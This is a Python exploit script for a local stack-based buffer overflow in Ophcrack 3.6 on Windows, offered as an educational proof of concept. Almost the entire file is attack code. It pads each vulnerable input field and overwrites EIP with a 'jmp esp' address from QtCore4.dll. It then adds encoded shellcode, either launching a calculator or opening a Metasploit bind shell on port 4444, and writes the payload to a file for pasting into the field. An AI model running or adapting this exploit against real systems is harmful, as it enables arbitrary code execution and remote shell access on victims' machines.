#!/usr/bin/python
# Title: Ophcrack 3.6 Local Stack Based Buffer Overflow
# Version: 3.6
# Tested on: Windows XP SP2 en, Windows 8 64-bit
# Vendor: http://ophcrack.sourceforge.net/
# Software Link: http://sourceforge.net/projects/ophcrack/files/ophcrack/3.6.0/ophcrack-win32-installer-3.6.0.exe
# Original Advisory: http://osandamalith.wordpress.com/2013/12/29/ophcrack-local-stack-based-buffer-overflow/
# E-Mail: osandajayathissa@gmail.com
# Exploit-Author: Osanda Malith
# Twitter: @OsandaMalith
# /!\ Author is not responsible for any damage you cause
# This POC is for educational purposes only
'''
This exploit is super lame, as no user is going to paste 1000 characters
of text into the textbox, however it could potentially be used for
privilege escalation. It was still a fun learning exercise.
'''
'''
To exploit this bug open Ophcrack -> Click Load -> Remote SAM
There are three fields "Host name:", "Share:", "User:"
All three fields are vulnerable. I have made this exploit to work on those 3 fields.
Copy the contents written to the file into the specific field you selected and click ok.
'''
print
'''
_/_/ _/ _/
_/ _/ _/_/_/ _/_/_/ _/_/_/ _/ _/_/ _/_/_/ _/_/_/ _/ _/
_/ _/ _/ _/ _/ _/ _/ _/_/ _/ _/ _/ _/_/
_/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/ _/
_/_/ _/_/_/ _/ _/ _/_/_/ _/ _/_/_/ _/_/_/ _/ _/
_/
_/
[+] Opchrack 3.6 Local Buffer Overflow Exploit
[+] Author: Osanda Malith Jayathissa < osandajayathissa [at] gmail.com >
[~] Special Thanks to Matt "hostess" Andreko < mandreko [at] accuvant.com >
'''
while
True
:
try
:
choice
=
int
(
raw_input
(
"[?] In which field do you want to inject our payload?\n1.Host name\n2.Share\n3.User\n"
))
except
ValueError:
print
"[!] Enter only a number"
continue
# If you select "Host name" you would get a error after injecting. Click "Don't send" and enjoy the payload
if
choice
=
=
1
:
buff
=
"A"
*
497
break
elif
choice
=
=
2
:
buff
=
"A"
*
504
break
elif
choice
=
=
3
:
buff
=
"A"
*
504
break
else
:
print
"[-] Invalid Choice"
continue
# jmp instruction must be 'ascii' due to character set restrictions
# jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtCore4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.8.4.0 (C:\Program Files\ophcrack\QtCore4.dll)
eip
=
"\x39\x5b\x2b\x6e"
while
True
:
try
:
choice
=
int
(
raw_input
(
"[?] Choose your payload:\n1.Calculator\n2.Bind Shell\n"
))
except
ValueError:
print
"[!] Enter only a number"
continue
if
choice
=
=
1
:
#ALPHA3.py esp --input="shellcode.bin"
shellcode
=
"TYhffffk4diFkDql02Dqm0D1CuEE0l3i8o3J378P4P8L4u8L3g0f3A0B1n2K405o7N5K328O4E3T4I0g"
shellcode
+
=
"0c1k0Q4M358P5M4y0I2Z3g3I3E3E2j4C2r110H135l0p0H7o381M0E0s3i4Z3D4p5k2C1l335N4R4L4D"
shellcode
+
=
"3w4X4H1L4p2n3R3M3L3C2x4s8o4H3M8N4y3J4P3j4S1k3b3L0h2r08125o1K0b1o101P0514373A1o0Z"
shellcode
+
=
"3O340Q0O0n5n4F4B8n4X1k0i4u4m0S407o0c1m4m4P5M2y135O1K0V1l4z3D0G3S0h120C4I183B0y14"
shellcode
+
=
"3h4H3G8K3S1L2k3E4r162Z3E7k5O138P5L3H0O0c0T15034I0v3M3P4H3h0Z2H3w3h3C002k7l4L3J1L"
shellcode
+
=
"2F3h0w3q0b8O3u2q064O1p4K3w0P3S0w1N2O2B043K0K7p3r4n1k2z0p017k0F3p4Y0u093d301n0n"
break
elif
choice
=
=
2
:
# Thanks to Matt for teaching me about choosing correct shellcode :-)
# Modify this part with your own custom shellcode
# msfpayload windows/shell/bind_tcp EXITFUNC=thread LPORT=4444 R| msfencode -e x86/alpha_mixed -t c BufferRegister=ESP
shellcode
=
(
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x49\x6c\x69\x78\x4e\x69\x73\x30"
"\x65\x50\x47\x70\x71\x70\x6f\x79\x39\x75\x74\x71\x78\x52\x31"
"\x74\x6e\x6b\x70\x52\x50\x30\x4e\x6b\x33\x62\x34\x4c\x4c\x4b"
"\x66\x32\x64\x54\x4c\x4b\x51\x62\x74\x68\x64\x4f\x4e\x57\x51"
"\x5a\x45\x76\x45\x61\x59\x6f\x74\x71\x59\x50\x4e\x4c\x37\x4c"
"\x70\x61\x53\x4c\x56\x62\x76\x4c\x47\x50\x39\x51\x7a\x6f\x56"
"\x6d\x46\x61\x6a\x67\x78\x62\x7a\x50\x70\x52\x46\x37\x4e\x6b"
"\x52\x72\x76\x70\x6e\x6b\x37\x32\x65\x6c\x43\x31\x4a\x70\x4c"
"\x4b\x71\x50\x54\x38\x4c\x45\x59\x50\x62\x54\x50\x4a\x45\x51"
"\x6e\x30\x32\x70\x6e\x6b\x71\x58\x46\x78\x6c\x4b\x50\x58\x31"
"\x30\x65\x51\x49\x43\x38\x63\x47\x4c\x32\x69\x4c\x4b\x54\x74"
"\x6c\x4b\x37\x71\x58\x56\x46\x51\x69\x6f\x56\x51\x39\x50\x4e"
"\x4c\x5a\x61\x6a\x6f\x76\x6d\x46\x61\x68\x47\x57\x48\x6d\x30"
"\x31\x65\x6c\x34\x53\x33\x73\x4d\x39\x68\x67\x4b\x31\x6d\x64"
"\x64\x43\x45\x58\x62\x51\x48\x4c\x4b\x53\x68\x61\x34\x66\x61"
"\x6a\x73\x35\x36\x6c\x4b\x44\x4c\x42\x6b\x6e\x6b\x71\x48\x67"
"\x6c\x33\x31\x6b\x63\x6c\x4b\x47\x74\x4e\x6b\x55\x51\x6a\x70"
"\x4e\x69\x63\x74\x67\x54\x47\x54\x71\x4b\x43\x6b\x45\x31\x76"
"\x39\x52\x7a\x73\x61\x69\x6f\x6b\x50\x32\x78\x63\x6f\x72\x7a"
"\x4c\x4b\x36\x72\x58\x6b\x6d\x56\x61\x4d\x62\x48\x65\x63\x50"
"\x32\x45\x50\x35\x50\x31\x78\x64\x37\x54\x33\x76\x52\x43\x6f"
"\x63\x64\x50\x68\x50\x4c\x54\x37\x37\x56\x65\x57\x59\x6f\x48"
"\x55\x6f\x48\x6a\x30\x76\x61\x45\x50\x53\x30\x66\x49\x6f\x34"
"\x30\x54\x32\x70\x75\x38\x37\x59\x6b\x30\x30\x6b\x57\x70\x49"
"\x6f\x68\x55\x56\x30\x42\x70\x50\x50\x32\x70\x31\x50\x36\x30"
"\x73\x70\x50\x50\x35\x38\x68\x6a\x74\x4f\x49\x4f\x69\x70\x39"
"\x6f\x39\x45\x4c\x49\x6a\x67\x55\x61\x59\x4b\x56\x33\x52\x48"
"\x74\x42\x47\x70\x56\x71\x33\x6c\x4e\x69\x39\x76\x31\x7a\x64"
"\x50\x52\x76\x56\x37\x32\x48\x59\x52\x59\x4b\x37\x47\x55\x37"
"\x79\x6f\x4a\x75\x50\x53\x50\x57\x31\x78\x68\x37\x7a\x49\x54"
"\x78\x4b\x4f\x59\x6f\x4a\x75\x50\x53\x62\x73\x31\x47\x45\x38"
"\x50\x74\x4a\x4c\x57\x4b\x68\x61\x59\x6f\x4e\x35\x72\x77\x4e"
"\x69\x4b\x77\x65\x38\x52\x55\x50\x6e\x50\x4d\x35\x31\x59\x6f"
"\x5a\x75\x65\x38\x70\x63\x70\x6d\x70\x64\x35\x50\x6f\x79\x79"
"\x73\x61\x47\x72\x77\x43\x67\x70\x31\x68\x76\x53\x5a\x54\x52"
"\x33\x69\x32\x76\x59\x72\x69\x6d\x51\x76\x4f\x37\x70\x44\x47"
"\x54\x45\x6c\x36\x61\x35\x51\x6c\x4d\x43\x74\x75\x74\x62\x30"
"\x49\x56\x73\x30\x42\x64\x63\x64\x52\x70\x63\x66\x30\x56\x70"
"\x56\x43\x76\x63\x66\x72\x6e\x52\x76\x63\x66\x50\x53\x53\x66"
"\x63\x58\x52\x59\x4a\x6c\x65\x6f\x4f\x76\x49\x6f\x48\x55\x6b"
"\x39\x79\x70\x70\x4e\x72\x76\x30\x46\x79\x6f\x44\x70\x50\x68"
"\x33\x38\x4e\x67\x45\x4d\x51\x70\x39\x6f\x58\x55\x6f\x4b\x59"
"\x70\x35\x4d\x37\x5a\x75\x5a\x31\x78\x6f\x56\x7a\x35\x4d\x6d"
"\x6f\x6d\x79\x6f\x38\x55\x67\x4c\x57\x76\x73\x4c\x65\x5a\x6f"
"\x70\x49\x6b\x6b\x50\x74\x35\x66\x65\x6d\x6b\x31\x57\x72\x33"
"\x61\x62\x70\x6f\x32\x4a\x37\x70\x56\x33\x59\x6f\x69\x45\x41"
"\x41"
)
print
"[+] Connect on port 4444"
break
else
:
print
"[-] Invalid Choice"
continue
junk
=
"A"
*
100
# Glad to write this at 17 ;)
# Combine strings
exploit
=
buff
+
eip
+
shellcode
+
junk
print
"[+] Writing to file >> exploit.txt"
# Write it out to file
file
=
open
(
"exploit.txt"
,
"w"
)
file
.write(exploit)
file
.close()
print
"[~] "
+
str
(
len
(exploit))
+
" Bytes written to file"
print
"[+] Copy all the contents inside the file into the field you selected and click ok"
#EOF